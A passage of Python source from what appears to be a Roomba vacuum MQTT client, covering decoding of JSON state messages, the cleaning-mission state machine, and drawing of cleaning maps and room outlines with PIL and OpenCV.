self.log.info("MAP: Maps Enabled")
self.mapSize = literal_eval(mapSize)
if len(mapSize) < 6:
self.log.error("mapSize is required, and is of the form "
"(800,1500,0,0,0,0) - (x,y size, x,y dock loc,"
"theta1, theta2), map,roomba roatation")
self.drawmap = False
return False
self.angle = self.mapSize[4]
self.roomba_angle = self.mapSize[5]
self.mapPath = mapPath
if home_icon_file is None:
self.home_icon_file = None
else:
self.home_icon_file = os.path.join(iconPath, home_icon_file)
self.roomba_icon_file = os.path.join(iconPath, roomba_icon_file)
self.roomba_error_file = os.path.join(iconPath, roomba_error_file)
self.roomba_cancelled_file = os.path.join(iconPath, roomba_cancelled_file)
self.roomba_battery_file = os.path.join(iconPath, roomba_battery_file)
self.bin_full_file = os.path.join(iconPath, bin_full_file)
self.draw_edges = draw_edges // 10000
self.auto_rotate = auto_rotate
if not roomOutline:
self.log.info("MAP: Not drawing Room Outline")
self.roomOutline = roomOutline
self.enableMapWithText = enableMapWithText
self.fillColor = fillColor
self.outlineColor = outlineColor
self.outlineWidth = outlineWidth
self.initialise_map(roomba_size)
return True
return False
def totimestamp(self, dt):
td = dt - datetime.datetime(1970, 1, 1)
return int(td.total_seconds())
def dict_merge(self, dct, merge_dct):
""" Recursive dict merge. Inspired by :meth:``dict.update()``, instead
of updating only top-level keys, dict_merge recurses down into dicts
nested to an arbitrary depth, updating keys. The ``merge_dct`` is
merged into ``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k, v in six.iteritems(merge_dct):
if (k in dct and isinstance(dct[k], dict)
and isinstance(merge_dct[k], Mapping)):
self.dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]
def decode_payload(self, topic, payload):
'''
Format json for pretty printing, return string sutiable for logging,
and a dict of the json data
'''
indent = self.master_indent + 31 #number of spaces to indent json data
try:
# if it's json data, decode it (use OrderedDict to preserve keys
# order), else return as is...
json_data = json.loads(
payload.decode("utf-8").replace(":nan", ":NaN").\
replace(":inf", ":Infinity").replace(":-inf", ":-Infinity"),
object_pairs_hook=OrderedDict)
# if it's not a dictionary, probably just a number
if not isinstance(json_data, dict):
return json_data, dict(json_data)
json_data_string = "\n".join((indent * " ") + i for i in \
(json.dumps(json_data, indent = 2)).splitlines())
formatted_data = "Decoded JSON: \n%s" % (json_data_string)
except ValueError:
formatted_data = payload
if self.raw:
formatted_data = payload
return formatted_data, dict(json_data)
def decode_topics(self, state, prefix=None):
'''
decode json data dict, and publish as individual topics to
brokerFeedback/topic the keys are concatinated with _ to make one unique
topic name strings are expressely converted to strings to avoid unicode
representations
'''
for k, v in six.iteritems(state):
if isinstance(v, dict):
if prefix is None:
self.decode_topics(v, k)
else:
self.decode_topics(v, prefix+"_"+k)
else:
if isinstance(v, list):
newlist = []
for i in v:
if isinstance(i, dict):
for ki, vi in six.iteritems(i):
newlist.append((str(ki), vi))
else:
if isinstance(i, six.string_types):
i = str(i)
newlist.append(i)
v = newlist
if prefix is not None:
k = prefix+"_"+k
# all data starts with this, so it's redundant
k = k.replace("state_reported_","")
# save variables for drawing map
if k == "pose_theta":
self.co_ords["theta"] = v
if k == "pose_point_x": #x and y are reversed...
self.co_ords["y"] = v
if k == "pose_point_y":
self.co_ords["x"] = v
if k == "bin_full":
self.bin_full = v
if k == "cleanMissionStatus_error":
try:
self.error_message = self._ErrorMessages[v]
except KeyError as e:
self.log.warn(
"Error looking up Roomba error message %s" % e)
self.error_message = "Unknown Error number: %d" % v
self.publish("error_message", self.error_message)
if k == "cleanMissionStatus_phase":
self.previous_cleanMissionStatus_phase = \
self.cleanMissionStatus_phase
self.cleanMissionStatus_phase = v
self.publish(k, str(v))
if prefix is None:
self.update_state_machine()
def update_state_machine(self, new_state = None):
'''
Roomba progresses through states (phases), current identified states
are:
"" : program started up, no state yet
"run" : running on a Cleaning Mission
"hmUsrDock" : returning to Dock
"hmMidMsn" : need to recharge
"hmPostMsn" : mission completed
"charge" : chargeing
"stuck" : Roomba is stuck
"stop" : Stopped
"pause" : paused
available states:
states = { "charge":"Charging",
"new":"New Mission",
"run":"Running",
"resume":"Running",
"hmMidMsn":"Recharging",
"recharge":"Recharging",
"stuck":"Stuck",
"hmUsrDock":"User Docking",
"dock":"Docking",
"dockend":"Docking - End Mission",
"cancelled":"Cancelled",
"stop":"Stopped",
"pause":"Paused",
"hmPostMsn":"End Mission",
"":None}
Normal Sequence is "" -> charge -> run -> hmPostMsn -> charge
Mid mission recharge is "" -> charge -> run -> hmMidMsn -> charge
-> run -> hmPostMsn -> charge
Stuck is "" -> charge -> run -> hmPostMsn -> stuck
-> run/charge/stop/hmUsrDock -> charge
Start program during run is "" -> run -> hmPostMsn -> charge
Need to identify a new mission to initialize map, and end of mission to
finalise map.
Assume charge -> run = start of mission (init map)
stuck - > charge = init map
Assume hmPostMsn -> charge = end of mission (finalize map)
Anything else = continue with existing map
'''
current_mission = self.current_state
#if self.current_state == None: #set initial state here for debugging
# self.current_state = self.states["recharge"]
# self.show_final_map = False
# deal with "bin full" timeout on mission
try:
if (self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"] == "none" and
self.cleanMissionStatus_phase == "charge" and
(self.current_state == self.states["pause"] or
self.current_state == self.states["recharge"])):
self.current_state = self.states["cancelled"]
except KeyError:
pass
if (self.current_state == self.states["charge"] and
self.cleanMissionStatus_phase == "run"):
self.current_state = self.states["new"]
elif (self.current_state == self.states["run"] and
self.cleanMissionStatus_phase == "hmMidMsn"):
self.current_state = self.states["dock"]
elif (self.current_state == self.states["dock"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["recharge"]
elif (self.current_state == self.states["recharge"] and
self.cleanMissionStatus_phase == "charge" and self.bin_full):
self.current_state = self.states["pause"]
elif (self.current_state == self.states["run"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["recharge"]
elif (self.current_state == self.states["recharge"]
and self.cleanMissionStatus_phase == "run"):
self.current_state = self.states["pause"]
elif (self.current_state == self.states["pause"]
and self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["pause"]
# so that we will draw map and can update recharge time
current_mission = None
elif (self.current_state == self.states["charge"] and
self.cleanMissionStatus_phase == "charge"):
# so that we will draw map and can update charge status
current_mission = None
elif ((self.current_state == self.states["stop"] or
self.current_state == self.states["pause"]) and
self.cleanMissionStatus_phase == "hmUsrDock"):
self.current_state = self.states["cancelled"]
elif ((self.current_state == self.states["hmUsrDock"] or
self.current_state == self.states["cancelled"]) and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["dockend"]
elif (self.current_state == self.states["hmPostMsn"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["dockend"]
elif (self.current_state == self.states["dockend"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["charge"]
else:
self.current_state = self.states[self.cleanMissionStatus_phase]
if new_state is not None:
self.current_state = self.states[new_state]
self.log.info("set current state to: %s" % (self.current_state))
if self.current_state != current_mission:
self.log.info("updated state to: %s" % (self.current_state))
self.publish("state", self.current_state)
self.draw_map(current_mission != self.current_state)
def make_transparent(self, image, colour=None):
'''
take image and make white areas transparent
return transparent image
'''
image = image.convert("RGBA")
datas = image.getdata()
newData = []
for item in datas:
# white (ish)
if item[0] >= 254 and item[1] >= 254 and item[2] >= 254:
newData.append(self.transparent)
else:
if colour:
newData.append(colour)
else:
newData.append(item)
image.putdata(newData)
return image
def make_icon(self, input="./roomba.png", output="./roomba_mod.png"):
#utility function to make roomba icon from generic roomba icon
if not HAVE_PIL: #drawing library loaded?
self.log.error("PIL module not loaded")
return None
try:
roomba = Image.open(input).convert('RGBA')
roomba = roomba.rotate(90, expand=False)
roomba = self.make_transparent(roomba)
draw_wedge = ImageDraw.Draw(roomba)
draw_wedge.pieslice(
[(5,0),(roomba.size[0]-5,roomba.size[1])],
175, 185, fill="red", outline="red")
roomba.save(output, "PNG")
return roomba
except Exception as e:
self.log.error("ERROR: %s" % e)
return None
def load_icon(self, filename="", icon_name=None, fnt=None, size=(32,32),
base_icon=None):
'''
Load icon from file, or draw icon if file not found.
returns icon object
'''
if icon_name is None:
return None
try:
icon = Image.open(filename).convert('RGBA').resize(
size,Image.ANTIALIAS)
icon = self.make_transparent(icon)
except IOError as e:
self.log.warn("error loading %s: %s, using default icon instead"
% (icon_name,e))
if base_icon is None:
icon = Image.new('RGBA', size, self.transparent)
else:
icon = base_icon
draw_icon = ImageDraw.Draw(icon)
if icon_name == "roomba":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
355, 5, fill="red", outline="red")
elif icon_name == "stuck":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
175, 185, fill="red", outline="red")
draw_icon.polygon([(
icon.size[0]//2,icon.size[1]), (0, 0), (0,icon.size[1])],
fill = 'red')
if fnt is not None:
draw_icon.text((4,-4), "!", font=fnt,
fill=(255,255,255,255))
elif icon_name == "cancelled":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
175, 185, fill="red", outline="red")
if fnt is not None:
draw_icon.text((4,-4), "X", font=fnt, fill=(255,0,0,255))
elif icon_name == "bin full":
draw_icon.rectangle([
icon.size[0]-10, icon.size[1]-10,
icon.size[0]+10, icon.size[1]+10],
fill = "grey")
if fnt is not None:
draw_icon.text((4,-4), "F", font=fnt,
fill=(255,255,255,255))
elif icon_name == "battery":
draw_icon.rectangle([icon.size[0]-10, icon.size[1]-10,
icon.size[0]+10,icon.size[1]+10], fill = "orange")
if fnt is not None:
draw_icon.text((4,-4), "B", font=fnt,
fill=(255,255,255,255))
elif icon_name == "home":
draw_icon.rectangle([0,0,32,32], fill="red", outline="black")
if fnt is not None:
draw_icon.text((4,-4), "D", font=fnt,
fill=(255,255,255,255))
else:
icon = None
#rotate icon 180 degrees
icon = icon.rotate(180-self.angle, expand=False)
return icon
def initialise_map(self, roomba_size):
'''
Initialize all map items (base maps, overlay, icons fonts etc)
'''
# get base image of Roomba path
if self.base is None:
'''try:
self.log.info("MAP: openening existing line image")
self.base = Image.open(
self.mapPath + '/' + self.roombaName + 'lines.png')\
.convert('RGBA')
if self.base.size != (self.mapSize[0], self.mapSize[1]):
raise IOError("Image is wrong size")
except IOError as e:
self.base = Image.new(
'RGBA',
(self.mapSize[0], self.mapSize[1]), self.transparent)
self.log.warn("MAP: line image problem: %s: created new image"
% e)
try:
self.log.info("MAP: openening existing problems image")
self.roomba_problem = Image.open(
self.mapPath + '/'+self.roombaName + 'problems.png')\
.convert('RGBA')
if self.roomba_problem.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.roomba_problem = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: problems image problem: %s: created new "
"image" % e)'''
self.base = Image.new(
'RGBA',
(self.mapSize[0], self.mapSize[1]), self.transparent)
self.roomba_problem = Image.new(
'RGBA', self.base.size, self.transparent)
try:
self.log.info("MAP: openening existing map no text image")
self.previous_map_no_text = None
self.map_no_text = Image.open(
self.mapPath + '/' + self.roombaName + 'map_notext.png')\
.convert('RGBA')
if self.map_no_text.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.map_no_text = None
self.log.warn("MAP: map no text image problem: %s: set to None"
% e)
# save x and y center of image, for centering of final map image
self.cx = self.base.size[0]
self.cy = self.base.size[1]
# get a font
if self.fnt is None:
try:
self.fnt = ImageFont.truetype('FreeMono.ttf', 40)
except IOError as e:
self.log.warn("error loading font: %s, loading default font"
% e)
self.fnt = ImageFont.load_default()
#set dock home position
if self.home_pos is None:
self.home_pos = (
self.mapSize[0] // 2 + self.mapSize[2],
self.mapSize[1] // 2 + self.mapSize[3])
self.log.info("MAP: home_pos: (%d,%d)"
% (self.home_pos[0], self.home_pos[1]))
#get icons
if self.roomba_icon is None:
self.roomba_icon = self.load_icon(
filename=self.roomba_icon_file, icon_name="roomba",
fnt=self.fnt, size=roomba_size, base_icon=None)
if self.roomba_error_icon is None:
self.roomba_error_icon = self.load_icon(
filename=self.roomba_error_file, icon_name="stuck",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.roomba_cancelled_icon is None:
self.roomba_cancelled_icon = self.load_icon(
filename=self.roomba_cancelled_file, icon_name="cancelled",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.roomba_battery_icon is None:
self.roomba_battery_icon = self.load_icon(
filename=self.roomba_battery_file, icon_name="battery",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.dock_icon is None and self.home_icon_file is not None:
self.dock_icon = self.load_icon(
filename=self.home_icon_file, icon_name="home", fnt=self.fnt)
self.dock_position = (
self.home_pos[0] - self.dock_icon.size[0] // 2,
self.home_pos[1] - self.dock_icon.size[1] // 2)
if self.bin_full_icon is None:
self.bin_full_icon = self.load_icon(
filename=self.bin_full_file, icon_name="bin full",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
self.log.info("MAP: Initialisation complete")
def transparent_paste(self, base_image, icon, position):
'''
needed because PIL pasting of transparent imges gives weird results
'''
image = Image.new('RGBA', self.base.size, self.transparent)
image.paste(icon,position)
base_image = Image.alpha_composite(base_image, image)
return base_image
def zero_coords(self):
'''
returns dictionary with default zero coords
'''
return {"x": 0, "y": 0, "theta": 180}
def offset_coordinates(self, old_co_ords, new_co_ords):
'''
offset coordinates according to mapSize settings, with 0,0 as center
'''
x_y = (new_co_ords["x"] + self.mapSize[0] // 2 + self.mapSize[2],
new_co_ords["y"] + self.mapSize[1] // 2 + self.mapSize[3])
old_x_y = (old_co_ords["x"]+self.mapSize[0] // 2 + self.mapSize[2],
old_co_ords["y"]+self.mapSize[1]//2+self.mapSize[3])
theta = int(new_co_ords["theta"] - 90 + self.roomba_angle)
while theta > 359: theta = 360 - theta
while theta < 0: theta = 360 + theta
return old_x_y, x_y, theta
def get_roomba_pos(self, x_y):
'''
calculate roomba position as list
'''
return [x_y[0] - self.roomba_icon.size[0] // 2,
x_y[1] - self.roomba_icon.size[1] // 2,
x_y[0] + self.roomba_icon.size[0] // 2,
x_y[1] + self.roomba_icon.size[1] // 2]
def draw_vacuum_lines(self, image, old_x_y, x_y, theta):
'''
draw lines on image from old_x_y to x_y reepresenting vacuum coverage,
taking into account angle theta (roomba angle).
'''
lines = ImageDraw.Draw(image)
if x_y != old_x_y:
self.log.info("MAP: drawing line: %s, %s" % (old_x_y, x_y))
lines.line([old_x_y, x_y], fill=self.fillColor,
width=self.roomba_icon.size[0] // 2)
#draw circle over roomba vacuum area to give smooth edges.
arcbox = [x_y[0]-self.roomba_icon.size[0] // 4,
x_y[1]-self.roomba_icon.size[0] // 4,
x_y[0]+self.roomba_icon.size[0] // 4,
x_y[1]+self.roomba_icon.size[0] // 4]
lines.ellipse(arcbox, fill=self.fillColor)
def draw_text(self, image, display_text, fnt, pos=(0,0),
colour=(0,0,255,255), rotate=False):
#draw text - (WARNING old versions of PIL have huge memory leak here!)
if display_text is None: return
self.log.info("MAP: writing text: pos: %s, text: %s"
% (pos, display_text))
if rotate:
txt = Image.new('RGBA', (fnt.getsize(display_text)),
self.transparent)
text = ImageDraw.Draw(txt)
# draw text rotated 180 degrees...
text.text((0,0), display_text, font=fnt, fill=colour)
image.paste(txt.rotate(180-self.angle, expand=True), pos)
else:
text = ImageDraw.Draw(image)
text.text(pos, display_text, font=fnt, fill=colour)
def draw_map(self, force_redraw=False):
'''
Draw map of Roomba cleaning progress
'''
if ((self.co_ords != self.previous_co_ords or
self.cleanMissionStatus_phase !=
self.previous_cleanMissionStatus_phase)
or force_redraw) and self.drawmap:
self.render_map(self.co_ords, self.previous_co_ords)
self.previous_co_ords = self.co_ords.copy()
self.previous_cleanMissionStatus_phase = \
self.cleanMissionStatus_phase
def render_map(self, new_co_ords, old_co_ords):
'''
draw map
'''
draw_final = False
stuck = False
cancelled = False
bin_full = False
battery_low = False
# program just started, and we don't have phase yet.
if self.current_state is None:
return
if self.show_final_map == False:
self.log.info("MAP: received: new_co_ords: %s old_co_ords: %s "
"phase: %s, state: %s" % (
new_co_ords, old_co_ords,
self.cleanMissionStatus_phase, self.current_state))
if self.current_state == self.states["charge"]:
self.log.info("MAP: ignoring new co-ords in charge phase")
new_co_ords = old_co_ords = self.zero_coords()
self.display_text = "Charging: Battery: " + \
str(self.master_state["state"]["reported"]["batPct"]) + "%"
if self.bin_full:
self.display_text = "Bin Full," + \
self.display_text.replace("Charging", "Not Ready")
if (self.last_completed_time is None or time.time() -
self.last_completed_time > 3600):
self.save_text_and_map_on_whitebg(self.map_no_text)
draw_final = True
elif self.current_state == self.states["recharge"]:
self.log.info("MAP: ignoring new co-ords in recharge phase")
new_co_ords = old_co_ords = self.zero_coords()
self.display_text = "Recharging:" + " Time: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["rechrgM"]) + "m"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
self.save_text_and_map_on_whitebg(self.map_no_text)
elif self.current_state == self.states["pause"]:
self.log.info("MAP: ignoring new co-ords in pause phase")
new_co_ords = old_co_ords
self.display_text = "Paused: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"]) + \
"m, Bat: "+ str(self.master_state["state"]["reported"]["batPct"]) + \
"%"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
# assume roomba is docked...
new_co_ords = old_co_ords = self.zero_coords()
self.save_text_and_map_on_whitebg(self.map_no_text)
elif self.current_state == self.states["hmPostMsn"]:
self.display_text = "Completed: " + \
time.strftime("%a %b %d %H:%M:%S")
self.log.info("MAP: end of mission")
elif self.current_state == self.states["dockend"]:
self.log.info("MAP: mission completed: ignoring new co-ords in "
"docking phase")
new_co_ords = old_co_ords = self.zero_coords()
self.draw_final_map(True)
draw_final = True
elif (self.current_state == self.states["run"] or
self.current_state == self.states["stop"] or
self.current_state == self.states["pause"]):
if self.current_state == self.states["run"]:
self.display_text = self.states["run"] + " Time: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"]) + \
"m, Bat: "+ str(self.master_state["state"]["reported"]["batPct"]) + \
"%"
else:
self.display_text = None
self.show_final_map = False
elif self.current_state == self.states["new"]:
self.angle = self.mapSize[4] #reset angle
self.base = Image.new('RGBA', self.base.size, self.transparent)
# overlay for roomba problem position
self.roomba_problem = Image.new('RGBA', self.base.size,
self.transparent)
self.show_final_map = False
self.display_text = None
self.log.info("MAP: created new image at start of new run")
elif self.current_state == self.states["stuck"]:
self.display_text = "STUCK!: " + time.strftime("%a %b %d %H:%M:%S")
self.draw_final_map(True)
draw_final = True
stuck = True
elif self.current_state == self.states["cancelled"]:
self.display_text = "Cancelled: " + \
time.strftime("%a %b %d %H:%M:%S")
cancelled = True
elif self.current_state == self.states["dock"]:
self.display_text = "Docking"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
bin_full = True
else:
self.display_text = "Battery low: " + \
str(self.master_state["state"]["reported"]["batPct"]) + \
"%, " + self.display_text
battery_low = True
else:
self.log.warn("MAP: no special handling for state: %s"
% self.current_state)
if self.base is None:
self.log.warn("MAP: no image, exiting...")
return
if self.display_text is None:
self.display_text = self.current_state
if self.show_final_map: #just display final map - not live
self.log.debug("MAP: not updating map - Roomba not running")
return
if self.debug:
# debug final map (careful, uses a lot of CPU power!)
self.draw_final_map()
#calculate co-ordinates, with 0,0 as center
old_x_y, x_y, theta = self.offset_coordinates(old_co_ords, new_co_ords)
roomba_pos = self.get_roomba_pos(x_y)
self.log.info("MAP: old x,y: %s new x,y: %s theta: %s roomba pos: %s" %
(old_x_y, x_y, theta, roomba_pos))
#draw lines
self.draw_vacuum_lines(self.base, old_x_y, x_y, theta)
# make a blank image for the text and Roomba overlay, initialized to
# transparent text color
roomba_sprite = Image.new('RGBA', self.base.size, self.transparent)
#draw roomba
self.log.info("MAP: drawing roomba: pos: %s, theta: %s"
% (roomba_pos, theta))
has_problems = False
if stuck:
self.log.info("MAP: Drawing stuck Roomba")
self.roomba_problem.paste(self.roomba_error_icon,roomba_pos)
has_problems = True
if cancelled:
self.log.info("MAP: Drawing cancelled Roomba")
self.roomba_problem.paste(self.roomba_cancelled_icon,roomba_pos)
has_problems = True
if bin_full:
self.log.info("MAP: Drawing full bin")
self.roomba_problem.paste(self.bin_full_icon,roomba_pos)
has_problems = True
if battery_low:
self.log.info("MAP: Drawing low battery Roomba")
self.roomba_problem.paste(self.roomba_battery_icon,roomba_pos)
has_problems = True
roomba_sprite = self.transparent_paste(
roomba_sprite,
self.roomba_icon.rotate(theta, expand=False), roomba_pos)
# paste dock over roomba_sprite
if self.dock_icon is not None:
roomba_sprite = self.transparent_paste(
roomba_sprite, self.dock_icon, self.dock_position)
'''# save base lines
self.base.save(self.mapPath + '/' + self.roombaName + 'lines.png',
"PNG")
# save problem overlay
self.roomba_problem.save(self.mapPath + '/' + self.roombaName + \
'problems.png', "PNG")'''
if self.roomOutline or self.auto_rotate:
# draw room outline (saving results if this is a final map) update
# x,y and angle if auto_rotate
self.draw_room_outline(draw_final)
# merge room outline into base
if self.roomOutline:
#if we want to draw the room outline
out = Image.alpha_composite(self.base, self.room_outline)
else:
out = self.base
#merge roomba lines (trail) with base
out = Image.alpha_composite(out, roomba_sprite)
if has_problems:
#merge problem location for roomba into out
out = Image.alpha_composite(out, self.roomba_problem)
if draw_final and self.auto_rotate:
#translate image to center it if auto_rotate is on
self.log.info("MAP: calculation of center: (%d,%d), "
"translating final map to center it, x:%d, y:%d "
"deg: %.2f" % (
self.cx, self.cy, self.cx - out.size[0] // 2,
self.cy - out.size[1] // 2,
self.angle))
out = out.transform(
out.size, Image.AFFINE,
(1, 0, self.cx-out.size[0] // 2,
0, 1, self.cy-out.size[1] // 2))
# map is upside down, so rotate 180 degrees, and size to fit (NW 12/4/2018 fixed bug causing distorted maps when rotation is not 0)
#out_rotated = out.rotate(180 + self.angle, expand=True).resize(self.base.size) #old version
out_rotated = out.rotate(180, expand=False)
# save composite image
self.save_text_and_map_on_whitebg(out_rotated)
if draw_final:
self.show_final_map = True # prevent re-drawing of map until reset
def save_text_and_map_on_whitebg(self, map):
# if no map or nothing changed
if map is None or (map == self.previous_map_no_text and
self.previous_display_text == self.display_text):
return
self.map_no_text = map
self.previous_map_no_text = self.map_no_text
self.previous_display_text = self.display_text
self.map_no_text.save(self.mapPath + '/' + self.roombaName +
'map_notext.png', "PNG")
if( self.enableMapWithText ):
final = Image.new('RGBA', self.base.size, (255,255,255,255)) # white
# paste onto a white background, so it's easy to see
final = Image.alpha_composite(final, map)
final = final.rotate(self.angle, expand=True) #(NW 12/4/2018 fixed bug causing distorted maps when rotation is not 0 - moved rotate to here)
# draw text
self.draw_text(final, self.display_text, self.fnt)
final.save(self.mapPath + '/'+self.roombaName + '_map.png', "PNG")
# try to avoid other programs reading file while writing it,
# rename should be atomic.
os.rename(self.mapPath + '/' + self.roombaName + '_map.png',
self.mapPath + '/' + self.roombaName + 'map.png')
def ScaleRotateTranslate(self, image, angle, center=None, new_center=None,
scale=None, expand=False):
'''
experimental - not used yet
'''
if center is None:
return image.rotate(angle, expand)
angle = -angle / 180.0 * math.pi
nx, ny = x, y = center
if new_center != center:
(nx, ny) = new_center
sx = sy = 1.0
if scale:
(sx, sy) = scale
cosine = math.cos(angle)
sine = math.sin(angle)
a = cosine / sx
b = sine / sx
c = x - nx * a - ny * b
d = -sine / sy
e = cosine / sy
f = y - nx * d - ny * e
return image.transform(image.size, Image.AFFINE,
(a,b,c,d,e,f), resample=Image.BICUBIC)
def match_outlines(self, orig_image, skewed_image):
orig_image = np.array(orig_image)
skewed_image = np.array(skewed_image)
try:
surf = cv2.xfeatures2d.SURF_create(400)
except Exception:
surf = cv2.SIFT(400)
kp1, des1 = surf.detectAndCompute(orig_image, None)
kp2, des2 = surf.detectAndCompute(skewed_image, None)
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)
search_params = dict(checks=50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des1, des2, k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m, n in matches:
if m.distance < 0.7 * n.distance:
good.append(m)
MIN_MATCH_COUNT = 10
if len(good) > MIN_MATCH_COUNT:
src_pts = np.float32([kp1[m.queryIdx].pt for m in good
]).reshape(-1, 1, 2)
dst_pts = np.float32([kp2[m.trainIdx].pt for m in good
]).reshape(-1, 1, 2)
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
# see https://ch.mathworks.com/help/images/examples/find-image-rotation-and-scale-using-automated-feature-matching.html for details
ss = M[0, 1]
sc = M[0, 0]
scaleRecovered = math.sqrt(ss * ss + sc * sc)
thetaRecovered = math.atan2(ss, sc) * 180 / math.pi
self.log.info("MAP: Calculated scale difference: %.2f, "
"Calculated rotation difference: %.2f" %
(scaleRecovered, thetaRecovered))
#deskew image
im_out = cv2.warpPerspective(skewed_image, np.linalg.inv(M),
(orig_image.shape[1], orig_image.shape[0]))
return im_out
else:
self.log.warn("MAP: Not enough matches are found - %d/%d"
% (len(good), MIN_MATCH_COUNT))
return skewed_image
def draw_room_outline(self, overwrite=False):
'''
draw room outline
'''
self.log.info("MAP: checking room outline")
if HAVE_CV2:
if self.room_outline_contour is None or overwrite:
try:
self.room_outline_contour = np.load(
self.mapPath + '/' + self.roombaName + 'room.npy')
except IOError as e:
self.log.warn("Unable to load room outline: %s, setting "
"to 0" % e)
self.room_outline_contour = np.array(
[(0,0),(0,0),(0,0),(0,0)], dtype=np.int)
try:
self.log.info("MAP: openening existing room outline image")
self.room_outline = Image.open(
self.mapPath + '/' + self.roombaName + 'room.png').\
convert('RGBA')
if self.room_outline.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.room_outline = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: room outline image problem: %s: "
"set to New" % e)
room_outline_area = cv2.contourArea(self.room_outline_contour)
# edgedata = cv2.add(
# np.array(self.base.convert('L'), dtype=np.uint8),
# np.array(self.room_outline.convert('L'), dtype=np.uint8))
edgedata = np.array(self.base.convert('L'))
# find external contour
_, contours, _ = self.findContours(
edgedata,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
if contours[0] is None: return
if len(contours[0]) < 5: return
max_area = cv2.contourArea(contours[0])
# experimental shape matching
# note cv2.cv.CV_CONTOURS_MATCH_I1 does not exist in CV 3.0,
# so just use 1
match = cv2.matchShapes(
self.room_outline_contour,contours[0],1,0.0)
self.log.info("MAP: perimeter/outline match is: %.4f" % match)
# if match is less than 0.35 - shapes are similar (but if it's 0 -
# then they are the same shape..) try auto rotating map to fit.
if match < 0.35 and match > 0:
#self.match_outlines(self.room_outline, self.base)
pass
if max_area > room_outline_area:
self.log.info("MAP: found new outline perimiter")
self.room_outline_contour = contours[0]
perimeter = cv2.arcLength(self.room_outline_contour,True)
outline = Image.new('RGBA',self.base.size,self.transparent)
edgeimage = np.array(outline) # make blank RGBA image array
# self.draw_edges is the max deviation from a line (set to 0.3%)
# you can fiddle with this
approx = cv2.approxPolyDP(
self.room_outline_contour,
self.draw_edges * perimeter,
True)
# outline with grey, width 1
cv2.drawContours(edgeimage,[approx] , -1, self.outlineColor, self.outlineWidth)
self.room_outline = Image.fromarray(edgeimage)
else:
if self.room_outline is None or overwrite:
try:
self.log.info("MAP: openening existing room outline image")
self.room_outline = Image.open(
self.mapPath + '/' + self.roombaName + 'room.png').\
convert('RGBA')
if self.room_outline.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.room_outline = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: room outline image problem: %s: "
"set to New" % e)
edges = ImageOps.invert(self.room_outline.convert('L'))
edges.paste(self.base)
edges = edges.convert('L').filter(ImageFilter.SMOOTH_MORE)
edges = ImageOps.invert(edges.filter(ImageFilter.FIND_EDGES))
self.room_outline = self.make_transparent(edges, (0, 0, 0, 255))
if overwrite or self.debug:
# save room outline
self.room_outline.save(
self.mapPath+'/'+self.roombaName+'room.png', "PNG")
if HAVE_CV2:
# save room outline contour as numpy array
np.save(self.mapPath + '/' + self.roombaName + 'room.npy',
self.room_outline_contour)
if self.auto_rotate:
# update outline centre
self.get_image_parameters(
image=self.room_outline, contour=self.room_outline_contour,
final=overwrite)
self.log.info("MAP: calculation of center: (%d,%d), "
"translating room outline to center it, "
"x:%d, y:%d deg: %.2f" % (
self.cx, self.cy,
self.cx - self.base.size[0] // 2,
self.cy - self.base.size[1] // 2,
self.angle))
# center room outline, same as map.
self.room_outline = self.room_outline.transform(
self.base.size, Image.AFFINE,
(1, 0, self.cx - self.base.size[0] // 2,
0, 1, self.cy-self.base.size[1]//2))
self.log.info("MAP: Wrote new room outline files")
def PIL_get_image_parameters(self, image=None, start=90, end = 0, step=-1,
recursion=0):
'''
updates angle of image, and centre using PIL.
NOTE: this assumes the floorplan is rectangular! if you live in a
lighthouse, the angle will not be valid!
input is PIL image
'''
if image is not None and HAVE_PIL:
imbw = image.convert('L')
max_area = self.base.size[0] * self.base.size[1]
x_y = (self.base.size[0] // 2, self.base.size[1] // 2)
angle = self.angle
div_by_10 = False
if step >=10 or step <=-10:
step /= 10
div_by_10 = True
for try_angle in range(start, end, step):
if div_by_10:
try_angle /= 10.0
#rotate image and resize to fit
im = imbw.rotate(try_angle, expand=True)
box = im.getbbox()
